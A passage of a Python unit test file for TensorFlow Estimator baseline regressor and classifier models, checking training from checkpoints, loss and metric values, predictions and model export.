tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _predict_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
features.pop('y')
return features, None
self._test_complete_flow(
train_input_fn=_train_input_fn,
eval_input_fn=_eval_input_fn,
predict_input_fn=_predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
class BaselineRegressorTrainingTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _assert_checkpoint(self,
label_dimension,
expected_global_step,
expected_bias=None):
shapes = {
name: shape
for (name, shape) in tf.train.list_variables(self._model_dir)
}
self.assertEqual([], shapes[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertEqual(expected_global_step,
tf.train.load_variable(self._model_dir,
tf.compat.v1.GraphKeys.GLOBAL_STEP))
self.assertEqual([label_dimension], shapes[BIAS_NAME])
if expected_bias is not None:
self.assertEqual(expected_bias,
tf.train.load_variable(self._model_dir,
BIAS_NAME))
def testFromScratchWithDefaultOptimizer(self):
# Create BaselineRegressor.
label = 5.
age = 17
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
# Train for a few steps, and validate final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self._assert_checkpoint(label_dimension=1, expected_global_step=num_steps)
def testTrainWithOneDimLabel(self):
label_dimension = 1
batch_size = 20
est = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
data_rank_1 = np.linspace(0., 2., batch_size, dtype=np.float32)
self.assertEqual((batch_size,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(label_dimension=1, expected_global_step=200)
def testTrainWithOneDimWeight(self):
label_dimension = 1
batch_size = 20
est = _baseline_regressor_fn(
label_dimension=label_dimension,
weight_column='w',
model_dir=self._model_dir)
data_rank_1 = np.linspace(0., 2., batch_size, dtype=np.float32)
self.assertEqual((batch_size,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1,
'w': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(label_dimension=1, expected_global_step=200)
def testFromScratch(self):
# Create BaselineRegressor.
label = 5.
age = 17
# loss = (logits - label)^2 = (0 - 5.)^2 = 25.
mock_optimizer = mock_optimizer_v2(self, expected_loss=25.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(
num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=num_steps,
expected_bias=[0.])
def testFromCheckpoint(self):
# Create initial checkpoint.
bias = 7.0
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable([bias], name=BIAS_NAME)
tf.Variable(
initial_global_step,
name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
    # logits = bias = 7.
# loss = (logits - label)^2 = (7 - 5)^2 = 4
mock_optimizer = mock_optimizer_v2(self, expected_loss=4.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((17,),)}, ((5.,),)), steps=num_steps)
self.assertEqual(
initial_global_step + num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=initial_global_step + num_steps,
expected_bias=[bias])
def testFromCheckpointMultiBatch(self):
# Create initial checkpoint.
bias = 5.0
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable([bias], name=BIAS_NAME)
tf.Variable(
initial_global_step,
name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# logits = bias
# logits[0] = 5.
# logits[1] = 5.
# loss = (sum(logits - label)^2 = (5 - 5)^2 + (5 - 3)^2) / 2 (batch size)
# loss = 2
mock_optimizer = mock_optimizer_v2(self, expected_loss=2.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((17,), (15,))}, ((5.,), (3.,))),
steps=num_steps)
self.assertEqual(
initial_global_step + num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
# Tests for Baseline Classifier.
class BaselineClassifierTrainingTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _assert_checkpoint(
self, n_classes, expected_global_step, expected_bias=None):
logits_dimension = n_classes if n_classes > 2 else 1
shapes = {
name: shape for (name, shape) in
tf.train.list_variables(self._model_dir)
}
self.assertEqual([], shapes[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertEqual(
expected_global_step,
tf.train.load_variable(
self._model_dir, tf.compat.v1.GraphKeys.GLOBAL_STEP))
self.assertEqual([logits_dimension], shapes[BIAS_NAME])
if expected_bias is not None:
self.assertAllEqual(expected_bias,
tf.train.load_variable(
self._model_dir, BIAS_NAME))
def _testFromScratchWithDefaultOptimizer(self, n_classes):
label = 0
age = 17
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
# Train for a few steps, and validate final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self._assert_checkpoint(n_classes, num_steps)
def testBinaryClassesFromScratchWithDefaultOptimizer(self):
self._testFromScratchWithDefaultOptimizer(n_classes=2)
def testMultiClassesFromScratchWithDefaultOptimizer(self):
self._testFromScratchWithDefaultOptimizer(n_classes=4)
def _testTrainWithTwoDimsLabel(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
data_rank_2 = np.array([[0], [1]])
self.assertEqual((2,), data_rank_1.shape)
self.assertEqual((2, 1), data_rank_2.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_2,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithTwoDimsLabel(self):
self._testTrainWithTwoDimsLabel(n_classes=2)
def testMultiClassesTrainWithTwoDimsLabel(self):
self._testTrainWithTwoDimsLabel(n_classes=4)
def _testTrainWithOneDimLabel(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
self.assertEqual((2,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithOneDimLabel(self):
self._testTrainWithOneDimLabel(n_classes=2)
def testMultiClassesTrainWithOneDimLabel(self):
self._testTrainWithOneDimLabel(n_classes=4)
def _testTrainWithTwoDimsWeight(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
weight_column='w', n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
data_rank_2 = np.array([[0], [1]])
self.assertEqual((2,), data_rank_1.shape)
self.assertEqual((2, 1), data_rank_2.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1, 'w': data_rank_2}, y=data_rank_1,
batch_size=batch_size, num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithTwoDimsWeight(self):
self._testTrainWithTwoDimsWeight(n_classes=2)
def testMultiClassesTrainWithTwoDimsWeight(self):
self._testTrainWithTwoDimsWeight(n_classes=4)
def _testTrainWithOneDimWeight(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
weight_column='w', n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
self.assertEqual((2,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1, 'w': data_rank_1}, y=data_rank_1,
batch_size=batch_size, num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithOneDimWeight(self):
self._testTrainWithOneDimWeight(n_classes=2)
def testMultiClassesTrainWithOneDimWeight(self):
self._testTrainWithOneDimWeight(n_classes=4)
def _testFromScratch(self, n_classes):
label = 1
age = 17
# For binary classifier:
# loss = sigmoid_cross_entropy(logits, label) where logits=0 (weights are
# all zero initially) and label = 1 so,
# loss = 1 * -log ( sigmoid(logits) ) = 0.69315
# For multi class classifier:
# loss = cross_entropy(logits, label) where logits are all 0s (weights are
# all zero initially) and label = 1 so,
# loss = 1 * -log ( 1.0 / n_classes )
# For this particular test case, as logits are same, the formula
# 1 * -log ( 1.0 / n_classes ) covers both binary and multi class cases.
mock_optimizer = mock_optimizer_v2(
self, expected_loss=-1 * math.log(1.0 / n_classes))
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=num_steps,
expected_bias=[0.] if n_classes == 2 else [.0] * n_classes)
def testBinaryClassesFromScratch(self):
self._testFromScratch(n_classes=2)
def testMultiClassesFromScratch(self):
self._testFromScratch(n_classes=4)
def _testFromCheckpoint(self, n_classes):
# Create initial checkpoint.
label = 1
age = 17
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# For binary classifier:
# logits = bias = -1.
# loss = sigmoid_cross_entropy(logits, label)
# so, loss = 1 * -log ( sigmoid(-1) ) = 1.3133
# For multi class classifier:
# loss = cross_entropy(logits, label)
# where logits = bias and label = 1
# so, loss = 1 * -log ( softmax(logits)[1] )
if n_classes == 2:
expected_loss = 1.3133
else:
logits = bias
logits_exp = np.exp(logits)
softmax = logits_exp / logits_exp.sum()
expected_loss = -1 * math.log(softmax[label])
mock_optimizer = mock_optimizer_v2(self, expected_loss=expected_loss)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
def testBinaryClassesFromCheckpoint(self):
self._testFromCheckpoint(n_classes=2)
def testMultiClassesFromCheckpoint(self):
self._testFromCheckpoint(n_classes=4)
def _testFromCheckpointFloatLabels(self, n_classes):
"""Tests float labels for binary classification."""
# Create initial checkpoint.
if n_classes > 2:
return
label = 0.8
age = 17
bias = [-1.0]
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# logits = bias = -1.
# loss = sigmoid_cross_entropy(logits, label)
# => loss = -0.8 * log(sigmoid(-1)) -0.2 * log(sigmoid(+1)) = 1.1132617
mock_optimizer = mock_optimizer_v2(self, expected_loss=1.1132617)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
def testBinaryClassesFromCheckpointFloatLabels(self):
self._testFromCheckpointFloatLabels(n_classes=2)
def testMultiClassesFromCheckpointFloatLabels(self):
self._testFromCheckpointFloatLabels(n_classes=4)
def _testFromCheckpointMultiBatch(self, n_classes):
# Create initial checkpoint.
label = [1, 0]
age = [17, 18.5]
batch_size = 2
    # For the binary case, the bias has shape (1,); for the multi class case,
    # it has shape (n_classes,). Initialize every dimension to -1.0.
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# For binary classifier:
# logits = bias
# logits[0] = -1.
# logits[1] = -1.
# loss = sigmoid_cross_entropy(logits, label)
# so, loss[0] = 1 * -log ( sigmoid(-1) ) = 1.3133
# loss[1] = (1 - 0) * -log ( 1- sigmoid(-1) ) = 0.3132
# For multi class classifier:
# loss = cross_entropy(logits, label)
# where logits = bias and label = [1, 0]
# so, loss = 1 * -log ( softmax(logits)[label] )
if n_classes == 2:
expected_loss = (1.3133 + 0.3132) / 2
else:
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
expected_loss = (expected_loss_0 + expected_loss_1) / 2
mock_optimizer = mock_optimizer_v2(self, expected_loss=expected_loss)
est = baseline.BaselineClassifierV2(
n_classes=n_classes,
optimizer=mock_optimizer,
model_dir=self._model_dir)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': (age)}, (label)),
steps=num_steps)
self.assertEqual(initial_global_step + num_steps,
est.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
n_classes,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
def testBinaryClassesFromCheckpointMultiBatch(self):
self._testFromCheckpointMultiBatch(n_classes=2)
def testMultiClassesFromCheckpointMultiBatch(self):
self._testFromCheckpointMultiBatch(n_classes=4)
class BaselineClassifierEvaluationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _test_evaluation_for_simple_data(self, n_classes):
label = 1
age = 1.
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=1)
if n_classes == 2:
# Binary classes: loss = -log(sigmoid(-1)) / batch size = 1.3133
# Prediction = sigmoid(-1) = 0.2689
expected_metrics = {
metric_keys.MetricKeys.LOSS: 1.3133,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: 1.3133,
metric_keys.MetricKeys.ACCURACY: 0.,
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: 0.2689,
metric_keys.MetricKeys.LABEL_MEAN: 1.,
metric_keys.MetricKeys.ACCURACY_BASELINE: 1,
metric_keys.MetricKeys.AUC: 0.,
metric_keys.MetricKeys.AUC_PR: 1.,
}
else:
# Multi classes: loss = 1 * -log ( softmax(logits)[label] )
logits = bias
logits_exp = np.exp(logits)
softmax = logits_exp / logits_exp.sum()
expected_loss = -1 * math.log(softmax[label])
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.,
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_for_simple_data(self):
self._test_evaluation_for_simple_data(n_classes=2)
def test_multi_classes_evaluation_for_simple_data(self):
self._test_evaluation_for_simple_data(n_classes=4)
def _test_evaluation_batch(self, n_classes):
"""Tests evaluation for batch_size==2."""
label = [1, 0]
age = [17., 18.]
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': (age)}, (label)), steps=1)
if n_classes == 2:
# Logits are (-1., -1.) labels are (1, 0).
# Loss is
# loss for row 1: 1 * -log(sigmoid(-1)) = 1.3133
# loss for row 2: (1 - 0) * -log(1 - sigmoid(-1)) = 0.3132
# Prediction = sigmoid(-1) = 0.2689
expected_loss = (1.3133 + 0.3132) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.5,
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: 0.2689,
metric_keys.MetricKeys.LABEL_MEAN: 0.5,
metric_keys.MetricKeys.ACCURACY_BASELINE: 0.5,
metric_keys.MetricKeys.AUC: 0.5,
metric_keys.MetricKeys.AUC_PR: 0.5,
}
else:
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
expected_loss = (expected_loss_0 + expected_loss_1) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: expected_loss,
metric_keys.MetricKeys.ACCURACY: 0.5,
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_batch(self):
self._test_evaluation_batch(n_classes=2)
def test_multi_classes_evaluation_batch(self):
self._test_evaluation_batch(n_classes=4)
def _test_evaluation_weights(self, n_classes):
"""Tests evaluation with weights."""
label = [1, 0]
age = [17., 18.]
weights = [1., 2.]
    # For the binary case, the bias has shape (1,); for the multi class case,
    # it has shape (n_classes,). Initialize every dimension to -1.0.
bias = [-1.0] if n_classes == 2 else [-1.0] * n_classes
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(
initial_global_step, name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
n_classes=n_classes,
weight_column='w',
model_dir=self._model_dir)
eval_metrics = est.evaluate(
input_fn=lambda: ({'age': (age), 'w': (weights)}, (label)), steps=1)
if n_classes == 2:
# Logits are (-1., -1.) labels are (1, 0).
# Loss is
# loss for row 1: 1 * -log(sigmoid(-1)) = 1.3133
# loss for row 2: (1 - 0) * -log(1 - sigmoid(-1)) = 0.3132
# weights = [1., 2.]
expected_loss = (1.3133 * 1. + 0.3132 * 2.) / 2 # batch size
loss_mean = (1.3133 * 1. + 0.3132 * 2.) / (1.0 + 2.0)
label_mean = np.average(label, weights=weights)
logits = [-1, -1]
logistics = sigmoid(np.array(logits))
predictions_mean = np.average(logistics, weights=weights)
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: loss_mean,
metric_keys.MetricKeys.ACCURACY: 2. / (1. + 2.),
metric_keys.MetricKeys.PRECISION: 0.,
metric_keys.MetricKeys.RECALL: 0.,
metric_keys.MetricKeys.PREDICTION_MEAN: predictions_mean,
metric_keys.MetricKeys.LABEL_MEAN: label_mean,
metric_keys.MetricKeys.ACCURACY_BASELINE: (
max(label_mean, 1-label_mean)),
metric_keys.MetricKeys.AUC: 0.5,
metric_keys.MetricKeys.AUC_PR: 0.33333,
}
else:
# Multi classes: unweighted_loss = 1 * -log ( soft_max(logits)[label] )
# Expand logits since batch_size=2
logits = bias * np.ones(shape=(2, 1))
logits_exp = np.exp(logits)
softmax_row_0 = logits_exp[0] / logits_exp[0].sum()
softmax_row_1 = logits_exp[1] / logits_exp[1].sum()
expected_loss_0 = -1 * math.log(softmax_row_0[label[0]])
expected_loss_1 = -1 * math.log(softmax_row_1[label[1]])
loss_mean = np.average([expected_loss_0, expected_loss_1],
weights=weights)
expected_loss = (loss_mean * np.sum(weights)) / 2 # batch size
expected_metrics = {
metric_keys.MetricKeys.LOSS: expected_loss,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100,
metric_keys.MetricKeys.LOSS_MEAN: loss_mean,
metric_keys.MetricKeys.ACCURACY: 2. / (1. + 2.),
}
self.assertAllClose(sorted_key_dict(expected_metrics),
sorted_key_dict(eval_metrics), rtol=1e-3)
def test_binary_classes_evaluation_weights(self):
self._test_evaluation_weights(n_classes=2)
def test_multi_classes_evaluation_weights(self):
self._test_evaluation_weights(n_classes=4)
class BaselineClassifierPredictTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _testPredictions(self, n_classes, label_vocabulary, label_output_fn):
"""Tests predict when all variables are one-dimensional."""
age = 1.
bias = [10.0] if n_classes == 2 else [10.0] * n_classes
with tf.Graph().as_default():
tf.Variable(bias, name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
est = _baseline_classifier_fn(
label_vocabulary=label_vocabulary,
n_classes=n_classes,
model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
x={'age': np.array([[age]])},
y=None,
batch_size=1,
num_epochs=1,
shuffle=False)
predictions = list(est.predict(input_fn=predict_input_fn))
if n_classes == 2:
scalar_logits = bias[0]
two_classes_logits = [0, scalar_logits]
two_classes_logits_exp = np.exp(two_classes_logits)
softmax = two_classes_logits_exp / two_classes_logits_exp.sum()
expected_predictions = {
'class_ids': [1],
'all_class_ids': [0, 1],
'classes': [label_output_fn(1)],
'all_classes': [label_output_fn(0), label_output_fn(1)],
'logistic': [sigmoid(np.array(scalar_logits))],
'logits': [scalar_logits],
'probabilities': softmax,
}
else:
onedim_logits = np.array(bias)
class_ids = onedim_logits.argmax()
all_class_ids = list(range(len(onedim_logits)))
logits_exp = np.exp(onedim_logits)
softmax = logits_exp / logits_exp.sum()
expected_predictions = {
'class_ids': [class_ids],
'all_class_ids': all_class_ids,
'classes': [label_output_fn(class_ids)],
'all_classes': [label_output_fn(i) for i in all_class_ids],
'logits': onedim_logits,
'probabilities': softmax,
}
self.assertEqual(1, len(predictions))
# assertAllClose cannot handle byte type.
self.assertEqual(expected_predictions['classes'], predictions[0]['classes'])
expected_predictions.pop('classes')
predictions[0].pop('classes')
self.assertAllEqual(expected_predictions['all_classes'],
predictions[0]['all_classes'])
expected_predictions.pop('all_classes')
predictions[0].pop('all_classes')
self.assertAllClose(sorted_key_dict(expected_predictions),
sorted_key_dict(predictions[0]))
def testBinaryClassesWithoutLabelVocabulary(self):
n_classes = 2
self._testPredictions(n_classes,
label_vocabulary=None,
label_output_fn=lambda x: ('%s' % x).encode())
def testBinaryClassesWithLabelVocabulary(self):
n_classes = 2
self._testPredictions(
n_classes,
label_vocabulary=['class_vocab_{}'.format(i)
for i in range(n_classes)],
label_output_fn=lambda x: ('class_vocab_%s' % x).encode())
def testMultiClassesWithoutLabelVocabulary(self):
n_classes = 4
self._testPredictions(
n_classes,
label_vocabulary=None,
label_output_fn=lambda x: ('%s' % x).encode())
def testMultiClassesWithLabelVocabulary(self):
n_classes = 4
self._testPredictions(
n_classes,
label_vocabulary=['class_vocab_{}'.format(i)
for i in range(n_classes)],
label_output_fn=lambda x: ('class_vocab_%s' % x).encode())
class BaselineClassifierIntegrationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _test_complete_flow(self, n_classes, train_input_fn, eval_input_fn,
predict_input_fn, input_dimension, prediction_length):
feature_columns = [
tf.feature_column.numeric_column('x', shape=(input_dimension,))
]
est = _baseline_classifier_fn(
n_classes=n_classes,
model_dir=self._model_dir)
# TRAIN
# learn y = x
est.train(train_input_fn, steps=200)
    # EVALUATE
scores = est.evaluate(eval_input_fn)
self.assertEqual(200, scores[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertIn(metric_keys.MetricKeys.LOSS, six.iterkeys(scores))
# PREDICT
predictions = np.array(
[x['classes'] for x in est.predict(predict_input_fn)])
self.assertAllEqual((prediction_length, 1), predictions.shape)
# EXPORT
feature_spec = tf.feature_column.make_parse_example_spec(
feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_saved_model(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(tf.compat.v1.gfile.Exists(export_dir))
def _test_numpy_input_fn(self, n_classes):
"""Tests complete flow with numpy_input_fn."""
input_dimension = 4
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * input_dimension, dtype=np.float32)
data = data.reshape(batch_size, input_dimension)
target = np.array([1] * batch_size)
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=target,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=target,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_numpy_input_fn(self):
self._test_numpy_input_fn(n_classes=2)
def test_multi_classes_numpy_input_fn(self):
self._test_numpy_input_fn(n_classes=4)
def _test_pandas_input_fn(self, n_classes):
"""Tests complete flow with pandas_input_fn."""
if not HAS_PANDAS:
return
    # Pandas DataFrame naturally supports 1 dim data only.
input_dimension = 1
batch_size = 10
data = np.array([1., 2., 3., 4.], dtype=np.float32)
target = np.array([1, 0, 1, 0], dtype=np.int32)
x = pd.DataFrame({'x': data})
y = pd.Series(target)
prediction_length = 4
train_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, num_epochs=None, shuffle=True)
eval_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, shuffle=False)
predict_input_fn = pandas_io.pandas_input_fn(
x=x, batch_size=batch_size, shuffle=False)
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_pandas_input_fn(self):
self._test_pandas_input_fn(n_classes=2)
def test_multi_classes_pandas_input_fn(self):
self._test_pandas_input_fn(n_classes=4)
def _test_input_fn_from_parse_example(self, n_classes):
"""Tests complete flow with input_fn constructed from parse_example."""
input_dimension = 2
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * input_dimension, dtype=np.float32)
data = data.reshape(batch_size, input_dimension)
target = np.array([1] * batch_size, dtype=np.int64)
serialized_examples = []
for x, y in zip(data, target):
example = example_pb2.Example(features=feature_pb2.Features(
feature={
'x':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=x)),
'y':
feature_pb2.Feature(int64_list=feature_pb2.Int64List(
value=[y])),
